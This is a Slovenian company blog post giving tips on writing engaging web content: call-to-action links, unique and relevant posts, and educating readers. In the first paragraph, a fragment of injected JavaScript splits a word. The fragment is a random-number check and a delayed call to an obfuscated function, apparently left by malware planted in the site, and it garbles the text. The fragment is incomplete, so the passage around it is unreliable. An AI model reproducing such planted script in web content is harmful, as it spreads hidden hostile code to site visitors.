fbpx

Kako pripraviti spletne vsebine, ki pritegnejo

Kako pripraviti spletne vsebine, ki pritegnejo

Kako pripraviti spletne vsebine, ki bralca pritegnejo?

Vsi se najbrž strinjamo, da je dandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andanes pač tako, da je postalo že kar obvezno, da v naše spletne strani vključimo tudi blog ali soroden vir inovativnih vsebin. Tisti, ki redno spremljate naše objave, že veste zakaj so unikatne vsebine postale tako pomembne, vsem ostalim radovednežem pa priporočamo branje prispevka »Vsebinski marketing: poslednja meja spletne nadvlade«. Na voljo vam je tukaj. Sedaj ko torej vsi vemo, zakaj so unikatne vsebine postale tako pomembne si poglejmo naslednji scenarij:

Polni navdušenja želite izkoristiti to vaše novo zanje, zato ste se odločili, da boste tudi sami pričeli pripravljati zanimive vsebine in jih objavljati na vaši spletni strani. Lotite se priprave vsebin, za katere ste prepričani, da jih bodo obiskovalci naše spletne strani z veseljem prebirali. Vaši novi »strasti« namenjate ure in ure. Objavljate nove in nove prispevke. Potem pa po navadi pride tisto neodložljivo vprašanje: pa ali ima to sploh smisel, ali to sploh kdo bere? Se sprašujete kaj storiti potem?

Spodaj vam predstavljamo nekaj nasvetov, kako pripraviti spletne vsebine, ki bralca dejansko tudi pritegnejo, kako pripraviti vsebine, za katere bo tudi Google menil, da so kvalitetne.

Vse se začne pri vas!

Vaš blog mora biti pristna predstavitev vas in vašega podjetja in mora vsebovati zdravo mero CTA (Call To Action) mest. To pomeni, da na vaši strani bralcu ne ponujate samo zanimivih vsebin, ampak tudi možnost nadaljnjega »raziskovanja« z enim samim klikom. Bralce morate torej na čim preprostejši način voditi do končnega cilja. In kaj je končni cilj? Lahko je nakup izdelka, lahko je oddano povpraševanje, lahko je vpisani email naslov, lahko je obisk vaše Facebook strani itd. Cilj si torej določite sami glede na to, kaj želite z objavami doseči. Pomembno je samo to, da daste bralcu v vsakem trenutku možnost, da z enim samim klikom nadaljuje pot po vaši spletni strani. In seveda najpomembnejše, vsebine morajo biti unikatne in za bralca relevantne. Nima smisla zapravljati časa za pripravo vsebin, ki govorijo o nečem, kar je za vaše obiskovalce povsem nepomembno, nima smisla samo »prepisovati« od drugih in nima smisla pripravljati vsebin o tematikah, ki so bile že mnogokrat obdelane. Vsebine raje objavljajte redkeje, ampak takrat bolj kvalitetne.

Bodite bralcem v pomoč!

Z vsebinami poizkušajte bralcem podajati odgovore na njihova vprašanja. Podajajte torej vsebine, ki bralca izobražujejo. Tako boste v njegovih očeh postali zanesljiv vir resničnih informacij in potencialen »poslovni partner«. Postal bo vaš reden sledilec in kot tak dosti bolj dovzeten za nakup tistega kar pač prodajate.

Ne pozabite, izobraževanje se nikdar ne konča!

Vsebine je potrebno pripravljati v nedogled. Vedno poizkušajte biti korak pred konkurenco. To pa lahko dosežete samo tako, da se tudi sami izobražujete in to novo pridobljeno znanje delite naprej.

0 Komentarjev

Odgovori

Vaš e-naslov ne bo objavljen. * označuje zahtevana polja

*